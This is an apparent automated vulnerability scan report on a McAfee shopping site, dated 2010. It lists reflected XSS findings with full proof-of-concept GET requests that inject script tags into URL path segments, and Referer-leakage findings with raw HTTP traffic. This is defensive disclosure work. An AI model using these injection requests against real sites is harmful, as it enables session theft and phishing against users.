secureshopping.mcafee.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://secureshopping.mcafee.com/browse/baby/toys/ [REST URL parameter 2] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b75be"><script>alert(1)</script>6c34af5df36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /browse/babyb75be"><script>alert(1)</script>6c34af5df36/toys/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

1.2. http://secureshopping.mcafee.com/browse/baby/toys/stuffed-toys/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/stuffed-toys/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7872"><script>alert(1)</script>2c1bfdf4f97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /browse/babyc7872"><script>alert(1)</script>2c1bfdf4f97/toys/stuffed-toys/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

1.3. http://secureshopping.mcafee.com/browse/clothing-accessories/jewelry-watches/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/clothing-accessories/jewelry-watches/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27344"><script>alert(1)</script>1c425c42aaa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /browse/clothing-accessories27344"><script>alert(1)</script>1c425c42aaa/jewelry-watches/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

2. Cross-domain Referer leakage previous next
There are 5 instances of this issue:

/browse/baby/
/browse/baby/
/browse/baby/
/browse/baby/
/safeseat-step-1-baby-classics-car-seat-in-rittenhouse-1756125--pid-214267116

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

2.1. http://secureshopping.mcafee.com/browse/baby/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/

Issue detail

The page was loaded from a URL containing a query string:

http://secureshopping.mcafee.com/browse/baby/?s=10

The response contains the following links to other domains:

http://image.become.com/imageserver/s0/757801630-100-100-5-0/
http://image.become.com/imageserver/s0/808095210-100-100-5-0/
http://image.become.com/imageserver/s1/712892011-100-100-5-0/
http://image.become.com/imageserver/s1/872644821-100-100-5-0/
http://image.become.com/imageserver/s4/635565624-100-100-5-0/
http://image.become.com/imageserver/s6/732127266-100-100-5-0/
http://image.become.com/imageserver/s6/791302346-100-100-5-0/
http://image.become.com/imageserver/s8/511687858-100-100-5-0/
http://image.become.com/imageserver/s8/791302348-100-100-5-0/
http://image.become.com/imageserver/s9/951652029-100-100-5-0/
http://images.scanalert.com/meter/secureshopping.mcafee.com/55.gif
http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js
http://www.addthis.com/bookmark.php?v=20
http://www.mcafeesecure.com/us/terms.jsp
https://www.mcafeesecure.com/RatingVerify?ref=secureshopping.mcafee.com

Request

GET /browse/baby/?s=10 HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:17 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:17 GMT
Content-Length: 71768

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Baby at McAfee Secure Shopping - Search, Discover & Compare
...[SNIP]...
</script>
<a style="font-weight:bold;text-decoration:none;font-size:11px;" href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()">Bookmark This Page</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...

<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=secureshopping.mcafee.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/secureshopping.mcafee.com/55.gif" alt="McAfee SECURE sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
HK90WbeB%252BlmOw1T8rZrHD6MWtEO6ipz%252BYOkogFOaUhR5SfC5QXnodYmvrIdT3KaOYGPmeHJEwP9mnGRP7b27ZhuV8eYWVBk0Y0H7SIjtS3B3W9MKLE8V%252BghRodv6vuZc14Vn0Bx9QR1rwAAAA%253D&cv=65"onclick="return trackclick(0);"><img width=100 height=100 src="http://image.become.com/imageserver/s0/808095210-100-100-5-0/" border=0 alt="Baby Pad"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
oo4UeS181I5zI4ZOxIOc9zPqggbZpikKO1OiTn9Hs5TPbJ2yHJ%252BFcdRqF0LoJ7ZXB0qw0d43XJM1ZjWBbgFSsp%252BnNLLEVzCTZ5ieS1535FBgeVDKEZr1pNjxVLYZxQ94mMK9IXS30AeqqTWgIBAAA%253D&cv=35"onclick="return trackclick(1);"><img width=100 height=100 src="http://image.become.com/imageserver/s1/712892011-100-100-5-0/" border=0 alt="Baby Mat with Bumper"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
A%26brand%3DPhilandTeds%26u%3DH4sIAAAAAAAAAMsoKSmw0tcvLy%252FXS67MTazQS87P1XfOz83Nz9MPKMpPKU0u0XdOLIEy9RKLCyrsPV1sjYxMDQwM1YKLkm2dUoFaUkFMoLiJgaWFkZEFAAIjBdlWAAAA&cv=65"onclick="return trackclick(2);"><img width=100 height=100 src="http://image.become.com/imageserver/s8/791302348-100-100-5-0/" border=0 alt="Phil and Ted's Sport Baby Buggy Navy and Charcoal"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
uS9U5A9Th1GTTH1fAyGQ%26brand%3DTous%26u%3DH4sIAAAAAAAAAMsoKSmw0tcvKUpMzs7MS9crTk0sSs7ITSzKTi0B8ZPzc%252FWTczKTs%252FUSiwvsEzNTbM0NLC0MTQ3NDQBS1SscOwAAAA%253D%253D&cv=60"onclick="return trackclick(3);"><img width=100 height=100 src="http://image.become.com/imageserver/s8/511687858-100-100-5-0/" border=0 alt="Baby Tous for Women by Tous EDC Spray 3.4 oz"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
tkmRS7EwbBhTvPEOL4Jy100pJMnOtbxN3jg7eoHtcQzMznlkpLlVGhnncJOZwVLMdVId0vKtuNk9I0XebZ8Whxgyoa3V3psaCSOfnEg%252BmF88fz4YZK7PtojL%252F9RPBehxB3fAGRPPiffwAAAA%253D%253D&cv=60"onclick="return trackclick(4);"><img width=100 height=100 src="http://image.become.com/imageserver/s6/732127266-100-100-5-0/" border=0 alt="Burberry BABY TOUCH for WOMEN EDT SPRAY 3.3 OZ"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
03A%26brand%3DCafePress%26u%3DH4sIAAAAAAAAAMsoKSmw0tcvLy%252FXS8pPqUwqzcxJycxL10vOz9UvLskvStUvzs%252FRz80vytPLKMnNsfd19nSxTUtKBcqn6gb7%252BxiYWQIAVxYwqkMAAAA%253D&cv=35"onclick="return trackclick(5);"><img width=100 height=100 src="http://image.become.com/imageserver/s4/635565624-100-100-5-0/" border=0 alt="Solaray Baby Me Now Morning Ease, 30 Vegetarian Capsules"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
vPonIyC5x%252FzBrGB6n7dGohumZ%252BRmmQI5pfCpQVhKAkjj3kuoQmNHV9L08OiZke7NuMkfi313V1xH55hKUFhTum%252BYYa1mxoZi2uHy%252FqkoASfPI6UEyOJ6%252BtnmWd5Gn1BYOQcg%252FCAAAA&cv=65"onclick="return trackclick(6);"><img width=100 height=100 src="http://image.become.com/imageserver/s0/757801630-100-100-5-0/" border=0 alt="Fancy Baby Pad"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
3DAustinAir%26u%3DH4sIAAAAAAAAAA3LUQqAIAwA0BNN%252F4PoKLLZwpFauNXw9vX%252BXzG7lxjdPeisL3YO%252BWoRHzXpgDKAkCbQYLQCh1TjEYq1umk6Pcu%252BZuVE%252FCf%252BAG9dhNBMAAAA&cv=70"onclick="return trackclick(7);"><img width=100 height=100 src="http://image.become.com/imageserver/s9/951652029-100-100-5-0/" border=0 alt="Austin Air Baby's Breath Replacement Filter - Blue"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
A%26brand%3DPhilandTeds%26u%3DH4sIAAAAAAAAAMsoKSmw0tcvLy%252FXS67MTazQS87P1XfOz83Nz9MPKMpPKU0u0XdOLIEy9RKLCyrsPV1sjYxMLC0t1YKLkm2dUoFaUkFMoLiJgaWFkZEZAKMih6hWAAAA&cv=65"onclick="return trackclick(8);"><img width=100 height=100 src="http://image.become.com/imageserver/s6/791302346-100-100-5-0/" border=0 alt="Phil and Ted's Sport Baby Buggy in Red and Charcoal"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
xi2GvOvKz4Gey2EmMU5KnpYJPFSLNvATii1DSeG1EJDi09cTagvyyeV%252BUTqQylvMzdkly0razoitBQ8gAeFJYz0MxZDpPwujofSkIqtP3FiT2%252BKIjDD3cDXt%252FWm%252BU%252FbfNoOiMBAAA%253D&cv=35"onclick="return trackclick(9);"><img width=100 height=100 src="http://image.become.com/imageserver/s1/872644821-100-100-5-0/" border=0 alt="Hospeco Precious Disposal Baby Diaper Full Feature 1 CS 85822"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...
</a>
 - 
<a target=_top href="http://www.mcafeesecure.com/us/terms.jsp">Terms of Service</a>
...[SNIP]...

2.2. http://secureshopping.mcafee.com/browse/baby/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/

Issue detail

The page was loaded from a URL containing a query string:

http://secureshopping.mcafee.com/browse/baby/?merchant=diaperscom

The response contains the following links to other domains:

http://image.become.com/imageserver/s0/956174270-100-100-5-0/
http://image.become.com/imageserver/s0/956175970-100-100-5-0/
http://image.become.com/imageserver/s3/956180843-100-100-5-0/
http://image.become.com/imageserver/s4/956172904-100-100-5-0/
http://image.become.com/imageserver/s7/956174737-100-100-5-0/
http://image.become.com/imageserver/s8/956181838-100-100-5-0/
http://image.become.com/imageserver/s9/956171849-100-100-5-0/
http://image.become.com/imageserver/s9/956172899-100-100-5-0/
http://image.become.com/imageserver/s9/956174269-100-100-5-0/
http://image.become.com/imageserver/s9/956176009-100-100-5-0/
http://images.scanalert.com/meter/secureshopping.mcafee.com/55.gif
http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js
http://www.addthis.com/bookmark.php?v=20
http://www.mcafeesecure.com/us/terms.jsp
https://www.mcafeesecure.com/RatingVerify?ref=secureshopping.mcafee.com

Request

GET /browse/baby/?merchant=diaperscom HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:12 GMT
Content-Length: 84269

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Baby at McAfee Secure Shopping - Search, Discover & Compare
...[SNIP]...
</script>
<a style="font-weight:bold;text-decoration:none;font-size:11px;" href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()">Bookmark This Page</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...

<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=secureshopping.mcafee.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/secureshopping.mcafee.com/55.gif" alt="McAfee SECURE sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
7AbTuPZhC%252FzEVFAZPPvOo%252FXVBsWluz74c9QRhzsEN3URzgRZq13oTNpjIn68qkYO8ydCC1anhyuENS%252FHc8h4Q3TUA3VCLYpQCKxoSquEDvgTyy01bmHy2yyLesSTtd1Tb%252FPnjo2kABAAA%253D&cv=56"onclick="return trackclick(0);"><img width=100 height=100 src="http://image.become.com/imageserver/s9/956176009-100-100-5-0/" border=0 alt="Baby Jogger Rain Canopy - Summit 360 Triple - PVC Free --"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
PH5mOA5PpB1P13QJYevbpTGEY9BltI6fU%252BTvZ0KrO8YxNum3oL7okjuQ44bPHVcJgerQAlT%252F8QYdE0ks4pwnZACVmaXBnLgNCL1Ee%252BX%252BjiqwMX%252F%252BomWlmGOf8H1zmLx0ABAAA%253D&cv=56"onclick="return trackclick(1);"><img width=100 height=100 src="http://image.become.com/imageserver/s0/956175970-100-100-5-0/" border=0 alt="Nomie Baby Infant Car Seat Cover - Navy -- blue"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
i2EFIl8G7Du403J1KbwvfjQQeUM0UhoO9dMm9QsKSW29Y2GOR%252BpGl%252FlWtqeEizowlBze8Wnb0wEjELcIv%252B%252F4ByNdLk7gc3TKcisZfR1sBkeguHtw5M%252FaDs5E91u1v%252FAeXFGeBIAQAA&cv=51"onclick="return trackclick(2);"><img width=100 height=100 src="http://image.become.com/imageserver/s3/956180843-100-100-5-0/" border=0 alt="Baby Mel Change Station - Leopard - Grey --"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
YTN3NTgVEl8Orx2SFvttFYq%252B%252FHIwbkMWYTtxYpwZSwTbs4ZuPAMa2ONB2jpqGmh3QnXBA04vdM7x4L15gHpEP%252Ff0CFFupyfyEtx3RNnG12dLA47uDw1IOFD8peftfU%252FcsfHBNa3EgBAAA%253D&cv=56"onclick="return trackclick(3);"><img width=100 height=100 src="http://image.become.com/imageserver/s0/956174270-100-100-5-0/" border=0 alt="Ergo Baby Performance Carrier - Spring Green --"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
tsR%252BmvveooYsqZN8OnD5pLW2cJw3ggCGMObuyvmge8yos%252BGIjaNTZiVyZHe5%252BhA2l1K1DiHZLTv%252BM5JrzrIqpSmWCfAmgGE7rmA71HysxOW4V%252F9Mgh34oh70zdUP8BiEYH1EABAAA%253D&cv=56"onclick="return trackclick(4);"><img width=100 height=100 src="http://image.become.com/imageserver/s8/956181838-100-100-5-0/" border=0 alt="Valco Baby Twin Ion Car Seat Adaptor - Chicco/Maxi Cosi --"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
Bn0Qz5w1y2EFIl8Oph5eCbbTTW5PvxoAPxwtBGt%252BYp6hTDRT07ZuPAoW0ONBUxNtT0iOZEI4GG%252F57o0wujKWYBduT%252FDyhXI03uz9gynU6JswhHA4vpHexferD0vbKT39XtbvMHYBXPsUgBAAA%253D&cv=56"onclick="return trackclick(5);"><img width=100 height=100 src="http://image.become.com/imageserver/s7/956174737-100-100-5-0/" border=0 alt="Baby K'Tan Carrier - Natural Organic -- size: large"></a>
...[SNIP]...
<br><img style="padding:5px;" width=115 height=32 border=0 src="http://images.scanalert.com/meter/www.mcafeesecure.com/22.gif"></a>
...[SNIP]...
